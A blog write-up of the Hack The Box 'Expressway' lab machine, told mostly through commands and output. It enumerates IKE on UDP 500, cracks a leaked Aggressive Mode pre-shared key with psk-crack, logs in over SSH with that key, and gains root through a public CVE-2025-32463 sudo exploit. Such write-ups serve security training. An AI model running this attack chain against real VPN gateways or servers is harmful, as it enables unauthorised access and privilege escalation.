moose.sh

HTB Expressway Writeup

Sep 26, 2025 • hackthebox, walkthrough, writeup

Nmap

A full TCP and UDP scan was run:

nmap -sC -sV -p- expressway.htb -oA expressway-fulltcp

Key results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian-8

No web ports were open. The machine hint "Interstate 500" suggested checking UDP 500 — CTFs sometimes leave a clue.

sudo nmap -sU -p 500,4500 -Pn -T4 expressway.htb -oN udp-scan

Open ports:

PORT     STATE         SERVICE
500/udp  open          isakmp
4500/udp open|filtered nat-t-ike

This indicated IKE (IPsec VPN) on the target.

ike-scan Enumeration

ike-scan was used to fingerprint the IKE service:

sudo ike-scan -A expressway.htb

Output:

10.129.144.254  Aggressive Mode Handshake returned
 HDR=(CKY-R=929b4a50d302886c)
 SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
 KeyExchange(128 bytes) Nonce(32 bytes)
 **ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)**
 VID=09002689dfd6b712 (XAUTH)
 VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
 Hash(20 bytes)

Key finding: the Aggressive Mode handshake leaked the identity ike@expressway.htb.

PSK Cracking

The handshake was captured for cracking:

sudo ike-scan -A -P expressway.htb > psk.txt

psk-crack was run with the rockyou wordlist:

sudo gunzip -k /usr/share/wordlists/rockyou.txt.gz
sudo psk-crack -d /usr/share/wordlists/rockyou.txt psk.txt

Output:

key "freakingrockstarontheroad" matches SHA1 hash ...

Pre-shared key:

freakingrockstarontheroad

SSH Access

SSH was attempted using the leaked username and cracked PSK:

ssh ike@expressway.htb

ike@expressway.htb's password: freakingrockstarontheroad
Linux expressway 6.16.7-1 #1 SMP Debian
Last login: Fri Sep 26 00:28:12 2025 from 10.10.15.9
ike@expressway:~$

The user flag was read from /home/ike/user.txt:

ike@expressway:~$ ls
user.txt
ike@expressway:~$ cat user.txt
84f2d8...

Privilege Escalation

linpeas revealed the sudo version, or sudo -V can be used:

Sudo version 1.9.17

CVE-2025-32463 affects sudo 1.9.17. The public exploit repository was used: https://github.com/KaiHT-Ladiant/CVE-2025-32463

Exploit workflow on the box:

ike@expressway:/tmp$ nano exploit.sh
ike@expressway:/tmp$ chmod +x exploit.sh
ike@expressway:/tmp$ ./exploit.sh
[*] Exploiting CVE-2025-32463...
[*] Attempting privilege escalation...
root@expressway:/# ls
bin   home            lib64       opt   sbin  usr
boot  initrd.img      lost+found  proc  srv   var
dev   initrd.img.old  media       root  sys   vmlinuz
etc   lib             mnt         run   tmp   vmlinuz.old
root@expressway:/# cd root
root@expressway:/root# ls
root.txt
root@expressway:/root# cat root.txt
7a0b35...

A root shell was obtained and the root flag read from /root/root.txt.

Summary

  • Enumerated UDP/500 → IKE Aggressive Mode.
  • Leaked identity: ike@expressway.htb.
  • Cracked PSK with rockyou → freakingrockstarontheroad.
  • SSH as ike, retrieved user flag.
  • Privilege escalation via sudo 1.9.17 (CVE-2025-32463) → root.

Expressway chained a VPN protocol misconfiguration (Aggressive Mode PSK leak) with a modern sudo exploit.

← Back to blog